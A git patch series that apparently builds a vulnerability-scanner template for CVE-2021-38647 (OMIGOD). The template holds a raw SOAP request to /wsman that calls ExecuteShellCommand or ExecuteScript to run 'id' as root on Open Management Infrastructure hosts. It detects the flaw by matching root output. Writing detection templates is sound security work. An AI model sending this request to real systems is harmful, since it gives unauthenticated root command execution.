From 03aa89e4de33174f1032fdd4cffa3ddb1b2a291c Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Wed, 15 Sep 2021 23:10:58 +0700
Subject: [PATCH 1/7] Create CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 57 +++++++++++++++++++++++++++++++++++
1 file changed, 57 insertions(+)
create mode 100644 cves/2021/CVE-2021-38647.yaml
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
new file mode 100644
index 0000000000..4c499f0b8a
--- /dev/null
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -0,0 +1,57 @@
+id: CVE-2021-38647
+
+info:
+ name: Open Management Infrastructure Remote Code Execution Vulnerability
+ author: daffainfo
+ severity: critical
+ tags: cve,cve2021,rce,omi
+ reference:
+ - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
+
+requests:
+
+ - raw:
+ - |
+ POST /wsman HTTP/1.1
+ Connection: Keep-Alive
+ Content-Length: 1505
+ Content-Type: application/soap+xml;charset=UTF-8
+ Host: {{Hostname}}
+
+
+
+ HTTP://192.168.1.1:5986/wsman/
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
+
+ http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
+
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand
+ 102400
+ uuid:0AB58087-C2C3-0005-0000-000000010000
+ PT1M30S
+
+
+
+
+ root/scx
+
+
+
+
+ id
+ 0
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "uid=0(root) gid=0(root) groups=0(root)"
+ part: body
+
+ - type: status
+ status:
+ - 200
From f168c83b4405f4d18d870d6072757aef200da1b1 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Wed, 15 Sep 2021 23:16:39 +0700
Subject: [PATCH 2/7] Update CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index 4c499f0b8a..db7f42b46b 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -21,7 +21,7 @@ requests:
- HTTP://192.168.1.1:5986/wsman/
+ HTTP://{{Hostname}}{{Path}}/
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
From a7fbdb10ae62029d086c556d4585bc8112b0c89a Mon Sep 17 00:00:00 2001
From: sandeep
Date: Wed, 15 Sep 2021 22:00:09 +0530
Subject: [PATCH 3/7] misc update - WIP
---
cves/2021/CVE-2021-38647.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index db7f42b46b..6facae24aa 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -1,13 +1,15 @@
id: CVE-2021-38647
info:
- name: Open Management Infrastructure Remote Code Execution Vulnerability
+ name: OMIGOD - Open Management Infrastructure RCE
author: daffainfo
severity: critical
tags: cve,cve2021,rce,omi
reference:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
+ - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
+ - https://github.com/microsoft/omi
requests:
@@ -21,7 +23,7 @@ requests:
- HTTP://{{Hostname}}{{Path}}/
+ {{BaseURL}}/wsman/
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
From 6eed1c1f296d98fe95344ad06efc5738d80ef4bf Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Fri, 17 Sep 2021 05:49:53 +0700
Subject: [PATCH 4/7] Update CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index 6facae24aa..30a8785d89 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -3,6 +3,7 @@ id: CVE-2021-38647
info:
name: OMIGOD - Open Management Infrastructure RCE
author: daffainfo
+ description: Unauthenticated RCE vulnerability in the Open Management Infrastructure by removing authentication header
severity: critical
tags: cve,cve2021,rce,omi
reference:
From b9cb5a8d720b434aab117fa3738e72dbd91a36c4 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Fri, 17 Sep 2021 12:56:55 +0700
Subject: [PATCH 5/7] Update CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index 30a8785d89..9ebc3f374c 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -10,6 +10,7 @@ info:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
+ - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
- https://github.com/microsoft/omi
requests:
@@ -52,7 +53,7 @@ requests:
matchers:
- type: word
words:
- - "uid=0(root) gid=0(root) groups=0(root)"
+ - "uid=0(root) gid=0(root) groups=0(root)"
part: body
- type: status
From e26a1bb759ee26ce5a10a9f235c742a2ce775267 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Fri, 17 Sep 2021 13:42:22 +0530
Subject: [PATCH 6/7] misc update
---
cves/2021/CVE-2021-38647.yaml | 81 ++++++++++++++++++-----------------
1 file changed, 42 insertions(+), 39 deletions(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index 9ebc3f374c..ab7069b79b 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -2,10 +2,10 @@ id: CVE-2021-38647
info:
name: OMIGOD - Open Management Infrastructure RCE
- author: daffainfo
- description: Unauthenticated RCE vulnerability in the Open Management Infrastructure by removing authentication header
+ author: daffainfo,xstp
severity: critical
- tags: cve,cve2021,rce,omi
+ tags: cve,cve2021,rce,omi,microsoft
+ description: Open Management Infrastructure Remote Code Execution Vulnerability
reference:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
@@ -14,48 +14,51 @@ info:
- https://github.com/microsoft/omi
requests:
-
- raw:
- |
POST /wsman HTTP/1.1
- Connection: Keep-Alive
- Content-Length: 1505
- Content-Type: application/soap+xml;charset=UTF-8
Host: {{Hostname}}
-
-
-
- {{BaseURL}}/wsman/
- http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
-
- http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
-
- http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand
- 102400
- uuid:0AB58087-C2C3-0005-0000-000000010000
- PT1M30S
-
-
-
-
- root/scx
-
-
-
-
- id
- 0
-
-
+ Content-Type: application/soap+xml;charset=UTF-8
+
+
+
+ HTTP://127.0.0.1:5985/wsman/
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
+
+ http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
+
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript
+ 102400
+ uuid:00B60932-CC01-0005-0000-000000010000
+ PT1M30S
+
+
+
+
+ root/scx
+
+
+
+
+ aWQ=
+
+ 0
+ true
+
+
- matchers-condition: and
matchers:
- type: word
words:
- - "uid=0(root) gid=0(root) groups=0(root)"
- part: body
-
- - type: status
- status:
- - 200
+ - ''
+ - 'uid=0(root) gid=0(root) groups=0'
+ condition: and
\ No newline at end of file
From 728e36a99dfcc34cef6267b3e1432adfbc2aa382 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Fri, 17 Sep 2021 13:42:40 +0530
Subject: [PATCH 7/7] Update CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index ab7069b79b..dbc79e1595 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -19,7 +19,7 @@ requests:
POST /wsman HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml;charset=UTF-8
-
+